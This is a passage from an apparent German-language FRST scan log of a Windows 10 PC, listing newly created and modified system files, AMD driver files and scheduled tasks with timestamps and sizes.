2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 
02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 
18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll 2017-05-07 18:11 - 2017-05-07 18:11 
- 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 
_____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program 
Files (x86)\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml 2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} 2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} 2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ 
C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} 2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS 2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician 2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared 2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino 2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten 2017-05-07 17:14 - 
2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten 2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin 2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD 2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS 2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) 
C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt
2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-21 18:01 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-20 14:33 -
2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew 2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini 2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD 2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\system32\mantleaxl64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll 